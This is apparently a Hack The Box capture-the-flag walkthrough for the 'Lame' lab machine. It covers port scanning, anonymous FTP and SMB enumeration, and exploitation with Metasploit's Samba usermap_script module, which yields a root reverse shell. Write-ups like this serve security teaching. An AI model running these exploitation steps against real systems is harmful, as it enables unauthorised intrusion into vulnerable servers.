HTB Walkthrough - Lame

Tony Harkness

- 4 minutes read - 668 words

Information Gathering

Scanned all TCP ports:

# save target IP as local variable
export ip='10.10.10.3'

#initial scan
rustscan -a $ip -- -sVC -T4 -oN /tmp/$boxname_initial.nmap

# scan results(had to rerun nmap with -Pn flag)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.150
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h30m21s, deviation: 3h32m10s, median: 19s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2025-12-29T11:40:28-05:00

Enumeration

Firstly, added hostnames to /etc/hosts file…

echo '10.10.10.3 lame.hackthebox.gr lame.htb'|sudo tee -a /etc/hosts

Only the first hostname was present in the nmap scan, but I added the second because that’s the standard for HTB machines…

Next, the nmap revealed their was anonymous FTP login, so I logged into FTP to see if we could retrieve anything

╭─kali at kali in ~/htb/b2r/lame
╰─○ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): ftp
331 Please specify the password.
Password:
230 Login successful.

Unfortunately, nothing was available here. Let’s check anonymous access to SMB shares

I used smbclient to check for SMB shares

╭─kali at kali in ~/htb/b2r/lame
╰─○ smbclient -N -L //10.10.10.3
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

I attempted to download all shares in the /tmp share…

╭─kali at kali in ~/htb/b2r/lame
╰─○ smbclient //10.10.10.3/tmp -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> prompt OFF; recurse ON; mget *

╭─kali at kali in ~/htb/b2r/lame
╰─○ ls
 .ICE-unix   .X11-unix   vmware-root   .X0-lock   vgauthsvclog.txt.0

The text file reveals there is a clock skew but nothing useful…

Exploitation

At this point, we’re kind of at a stand still, so we should check exploit-db for exploits on the services we have thus far

╭─kali at kali in ~/htb/b2r/lame
╰─○ searchsploit vsftpd 2.3.4
 Exploit Title                                      <snip>
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                                                                                               | unix/remote/17491.rb
<snip>
---------------------------------------------------
╭─kali at kali in ~/htb/b2r/lame
╰─○ searchsploit samba 3.0.20
 Exploit Title                                      
 <snip>
 Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                                                                     | unix/remote/16320.rb
<snip>

First, I attempted the ftp backdoor, unfortunately it failed..

msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Now, I’ll attempt the SMB exploit

msf exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.150:4444
[*] Command shell session 1 opened (10.10.14.150:4444 -> 10.10.10.3:58928) at 2025-12-29 12:15:41 -0500

id;whoami;pwd
uid=0(root) gid=0(root)
root
/

We can now grab both flags 😀

Steps 2 Pwn

  1. Scan + enumeration with rustscan
  2. Search exploits for service versions
  3. Attempt metasploit module affecting SMB 3.0.20(CVE-2007-2447)
  4. Shell as root, grab flags

Improved skills

  • Knowing that with no valuable information, it’s best to go back to what you already know. In this case, it was service versions. Checking their available exploits shouldn’t be looked past

Used tools

  • rustscan
  • smbclient
  • msfconsole
  • searchsploit